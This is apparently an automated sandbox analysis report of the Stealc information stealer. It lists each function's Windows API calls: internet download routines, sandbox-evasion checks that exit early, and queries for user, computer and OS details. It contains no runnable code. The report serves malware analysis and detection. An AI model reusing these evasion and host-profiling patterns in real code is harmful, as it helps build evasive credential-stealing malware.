Opcode ID: c44ea631078603d3bb6efb83a03319e6350c75730510b6296ea50d4abcced298
Instruction ID: 40849cff2e006c03551032ca7e9ba11fb489b6d413b4a481c431d3b3fdbd0ae1
Opcode Fuzzy Hash: c44ea631078603d3bb6efb83a03319e6350c75730510b6296ea50d4abcced298
Instruction Fuzzy Hash: 2BB12471910118DBDB14FBA0ED96EEE733CBF54300F404568F506A7191EF386A99EB62

Function 00F14FB0 Relevance: 12.1, APIs: 8, Instructions: 82networkmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00F14FCA
RtlAllocateHeap.NTDLL(00000000), ref: 00F14FD1
InternetOpenA.WININET(00F30DDF,00000000,00000000,00000000,00000000), ref: 00F14FEA
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00F15011
InternetReadFile.WININET(00F25EDB,?,00000400,00000000), ref: 00F15041
memcpy.MSVCRT(00000000,?,00000001), ref: 00F1508A
InternetCloseHandle.WININET(00F25EDB), ref: 00F150B9
InternetCloseHandle.WININET(?), ref: 00F150C6

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
String ID:
API String ID: 1008454911-0
Opcode ID: 82e4911d225cc724879bae63c74e536b8dafd50f08a08a2a84eefdf292cced13
Instruction ID: 7fa7dc0f8af57a027e351b35964f13060966bb9b266121ba5d53ee0d4af8c4e3
Opcode Fuzzy Hash: 82e4911d225cc724879bae63c74e536b8dafd50f08a08a2a84eefdf292cced13
Instruction Fuzzy Hash: D23106B4A40218EBDB24CF94DC85BDCB7B4EF48704F1081E9E709A7284CA706AC59F98

Function 00F24780 Relevance: 10.6, APIs: 7, Instructions: 101stringCOMMON

Download Yara Rule

APIs

lstrcatA.KERNEL32(?,01780FD8,?,00000104,?,00000104,?,00000104,?,00000104), ref: 00F247DB

Part of subcall function 00F28DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00F28E0B

lstrcatA.KERNEL32(?,00000000), ref: 00F24801
lstrcatA.KERNEL32(?,?), ref: 00F24820
lstrcatA.KERNEL32(?,?), ref: 00F24834
lstrcatA.KERNEL32(?,0177B998), ref: 00F24847
lstrcatA.KERNEL32(?,?), ref: 00F2485B
lstrcatA.KERNEL32(?,01781628), ref: 00F2486F

Part of subcall function 00F2A740: lstrcpy.KERNEL32(00F30AEF,00000000), ref: 00F2A788

Part of subcall function 00F28D90: GetFileAttributesA.KERNEL32(00000000,?,00F20117,?,00000000,?,00000000,00F30DAB,00F30DAA), ref: 00F28D9F

Part of subcall function 00F24570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00F24580
Part of subcall function 00F24570: HeapAlloc.KERNEL32(00000000), ref: 00F24587
Part of subcall function 00F24570: wsprintfA.USER32 ref: 00F245A6
Part of subcall function 00F24570: FindFirstFileA.KERNEL32(?,?), ref: 00F245BD

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
String ID:
API String ID: 167551676-0
Opcode ID: 5802cb9e2573fca7e1d5adaba51eda14a419b20bb75bd08417d3f1fce19e2b06
Instruction ID: 3e9a38a770d02f75fd31a1bdedcb1f926d7d8565f35681bcdbffef94ea888aed
Opcode Fuzzy Hash: 5802cb9e2573fca7e1d5adaba51eda14a419b20bb75bd08417d3f1fce19e2b06
Instruction Fuzzy Hash: F93162B2940318A7CB24F7A0EC86EED7378AF48700F404599B31596081EE7896C99B95

Function 00F269F0 Relevance: 10.6, APIs: 7, Instructions: 89sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00F29860: GetProcAddress.KERNEL32(74DD0000,01773918), ref: 00F298A1
Part of subcall function 00F29860: GetProcAddress.KERNEL32(74DD0000,01773A20), ref: 00F298BA
Part of subcall function 00F29860: GetProcAddress.KERNEL32(74DD0000,01773AC8), ref: 00F298D2
Part of subcall function 00F29860: GetProcAddress.KERNEL32(74DD0000,01773930), ref: 00F298EA
Part of subcall function 00F29860: GetProcAddress.KERNEL32(74DD0000,01773960), ref: 00F29903
Part of subcall function 00F29860: GetProcAddress.KERNEL32(74DD0000,017703C0), ref: 00F2991B
Part of subcall function 00F29860: GetProcAddress.KERNEL32(74DD0000,0176AD70), ref: 00F29933
Part of subcall function 00F29860: GetProcAddress.KERNEL32(74DD0000,0176AEF0), ref: 00F2994C
Part of subcall function 00F29860: GetProcAddress.KERNEL32(74DD0000,01773AE0), ref: 00F29964
Part of subcall function 00F29860: GetProcAddress.KERNEL32(74DD0000,01773A50), ref: 00F2997C
Part of subcall function 00F29860: GetProcAddress.KERNEL32(74DD0000,017737F8), ref: 00F29995
Part of subcall function 00F29860: GetProcAddress.KERNEL32(74DD0000,01773990), ref: 00F299AD
Part of subcall function 00F29860: GetProcAddress.KERNEL32(74DD0000,0176ADD0), ref: 00F299C5
Part of subcall function 00F29860: GetProcAddress.KERNEL32(74DD0000,01773A68), ref: 00F299DE

Part of subcall function 00F2A740: lstrcpy.KERNEL32(00F30AEF,00000000), ref: 00F2A788

Part of subcall function 00F111D0: ExitProcess.KERNEL32 ref: 00F11211

Part of subcall function 00F11160: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00F26A17,00F30AEF), ref: 00F1116A
Part of subcall function 00F11160: ExitProcess.KERNEL32 ref: 00F1117E

Part of subcall function 00F11110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00F26A1C), ref: 00F1112B
Part of subcall function 00F11110: VirtualAllocExNuma.KERNEL32(00000000,?,?,00F26A1C), ref: 00F11132
Part of subcall function 00F11110: ExitProcess.KERNEL32 ref: 00F11143

Part of subcall function 00F11220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00F1123E
Part of subcall function 00F11220: __aulldiv.LIBCMT ref: 00F11258
Part of subcall function 00F11220: __aulldiv.LIBCMT ref: 00F11266
Part of subcall function 00F11220: ExitProcess.KERNEL32 ref: 00F11294

Part of subcall function 00F26770: GetUserDefaultLangID.KERNEL32(?,?,00F26A26,00F30AEF), ref: 00F26774

GetUserDefaultLCID.KERNEL32 ref: 00F26A26

Part of subcall function 00F11190: ExitProcess.KERNEL32 ref: 00F111C6

Part of subcall function 00F27850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00F111B7), ref: 00F27880
Part of subcall function 00F27850: HeapAlloc.KERNEL32(00000000,?,?,?,00F111B7), ref: 00F27887
Part of subcall function 00F27850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00F2789F

Part of subcall function 00F278E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00F26A2B), ref: 00F27910
Part of subcall function 00F278E0: HeapAlloc.KERNEL32(00000000,?,?,?,00F26A2B), ref: 00F27917
Part of subcall function 00F278E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00F2792F

Part of subcall function 00F2A9B0: lstrlenA.KERNEL32(?,00F31110,?,00000000,00F30AEF), ref: 00F2A9C5
Part of subcall function 00F2A9B0: lstrcpy.KERNEL32(00000000), ref: 00F2AA04
Part of subcall function 00F2A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 00F2AA12

Part of subcall function 00F2A8A0: lstrcpy.KERNEL32(?,00F30AEF), ref: 00F2A905

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,017703D0,?,00F3110C,?,00000000,?,00F31110,?,00000000,00F30AEF), ref: 00F26ACA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00F26AE8
CloseHandle.KERNEL32(00000000), ref: 00F26AF9
Sleep.KERNEL32(00001770), ref: 00F26B04
CloseHandle.KERNEL32(?,00000000,?,017703D0,?,00F3110C,?,00000000,?,00F31110,?,00000000,00F30AEF), ref: 00F26B1A
ExitProcess.KERNEL32 ref: 00F26B22

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleName__aulldiv$ComputerCreateCurrentGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
String ID:
API String ID: 3511611419-0
Opcode ID: ab71927460eef44a9460cda4823919b1111204562654608db2a6a67b0f9295f8
Instruction ID: 8aef269082632fae161034def566964223780d2ece7dd1cca243c5e68973a9aa
Opcode Fuzzy Hash: ab71927460eef44a9460cda4823919b1111204562654608db2a6a67b0f9295f8
Instruction Fuzzy Hash: 8731FF71940228ABDB14F7F0FC56BEE7778BF54340F104528F612A6181DF785985EBA2

Function 00F283DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00F28426
wsprintfA.USER32 ref: 00F28459
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00F2847B
RegCloseKey.ADVAPI32(00000000), ref: 00F2848C
RegCloseKey.ADVAPI32(00000000), ref: 00F28499

Part of subcall function 00F2A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F2A7E6

RegQueryValueExA.KERNEL32(00000000,01780E88,00000000,000F003F,?,00000400), ref: 00F284EC
lstrlenA.KERNEL32(?), ref: 00F28501
RegQueryValueExA.KERNEL32(00000000,01780CA8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00F30B34), ref: 00F28599
RegCloseKey.KERNEL32(00000000), ref: 00F28608
RegCloseKey.ADVAPI32(00000000), ref: 00F2861A

Strings

%s\%s, xrefs: 00F2844D

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
String ID: %s\%s
API String ID: 3896182533-4073750446
Opcode ID: 2944681af6e0bb0279d62207caedfd117a4caea003cd4d7f9e957bf2d09b476d
Instruction ID: c2a48c7ada2c82430f66f1f59b0deb6d68ffbab7cb19214641eebdc568e61d77
Opcode Fuzzy Hash: 2944681af6e0bb0279d62207caedfd117a4caea003cd4d7f9e957bf2d09b476d
Instruction Fuzzy Hash: 7B21F8719502289BDB24DB54EC85FE9B7B8FF48710F0081A9A60996140DF756A86CF94

Function 00F147B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60stringnetworkCOMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(00000800), ref: 00F147EA
??2@YAPAXI@Z.MSVCRT(00000800), ref: 00F14801
??2@YAPAXI@Z.MSVCRT(00000800), ref: 00F14818
lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00F14839
InternetCrackUrlA.WININET(00000000,00000000), ref: 00F14849

Strings

<, xrefs: 00F147C9

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: ??2@$CrackInternetlstrlen
String ID: <
API String ID: 1683549937-4251816714
Opcode ID: a4bfe64168e2631b1dece2bdf2abb9bdebf1893cfceeb6401ad842b60a9fbae2
Instruction ID: a967a8bae9e9d7bbbd43aeef1fe22c321d0d061e7b8f3e441130cd0f1cc1743c
Opcode Fuzzy Hash: a4bfe64168e2631b1dece2bdf2abb9bdebf1893cfceeb6401ad842b60a9fbae2
Instruction Fuzzy Hash: 9721E8B1D00219ABDF14DFA4E849ADD7B74FF44320F108225F926A7290EB746A16DF91

Function 00F27690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F276A4
HeapAlloc.KERNEL32(00000000), ref: 00F276AB
RegOpenKeyExA.KERNEL32(80000002,0177A780,00000000,00020119,00000000), ref: 00F276DD
RegQueryValueExA.KERNEL32(00000000,01780D20,00000000,00000000,?,000000FF), ref: 00F276FE
RegCloseKey.ADVAPI32(00000000), ref: 00F27708

Strings

Windows 11, xrefs: 00F276BD

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID: Windows 11
API String ID: 3466090806-2517555085
Opcode ID: ae8fdc8e1afa5e180533e2726ab59559a5df935330c9faaf683edea7569be741
Instruction ID: 02bf568ccb1ab74c1cb64f060e84bbeafe5726f3cb0ebbf736cff54a50fae2c7
Opcode Fuzzy Hash: ae8fdc8e1afa5e180533e2726ab59559a5df935330c9faaf683edea7569be741
Instruction Fuzzy Hash: A1018FB5A84308FFD714EBE0F849F6DBBB8EF08701F004164FA15D7285E67099809B50

Function 00F27720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F27734
HeapAlloc.KERNEL32(00000000), ref: 00F2773B
RegOpenKeyExA.KERNEL32(80000002,0177A780,00000000,00020119,00F276B9), ref: 00F2775B
RegQueryValueExA.KERNEL32(00F276B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00F2777A
RegCloseKey.ADVAPI32(00F276B9), ref: 00F27784

Strings

CurrentBuildNumber, xrefs: 00F27771

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3466090806-1022791448
Opcode ID: 3909db88906edf0f1aecd92f2648ff6006fdfccf938c4aae7409aa904cacadb7
Instruction ID: 05399450432e069ca9947079d722f42cf4427cfedb01e4547cf121f00c0240f3
Opcode Fuzzy Hash: 3909db88906edf0f1aecd92f2648ff6006fdfccf938c4aae7409aa904cacadb7
Instruction Fuzzy Hash: 150184B5A40308FFDB14DBE0EC49FAEBBB8EF08701F004264FA15A7285DB7055408B50

Function 00F240B0 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00F240D5
RegOpenKeyExA.KERNEL32(80000001,01781688,00000000,00020119,?), ref: 00F240F4
RegQueryValueExA.ADVAPI32(?,01780F60,00000000,00000000,00000000,000000FF), ref: 00F24118
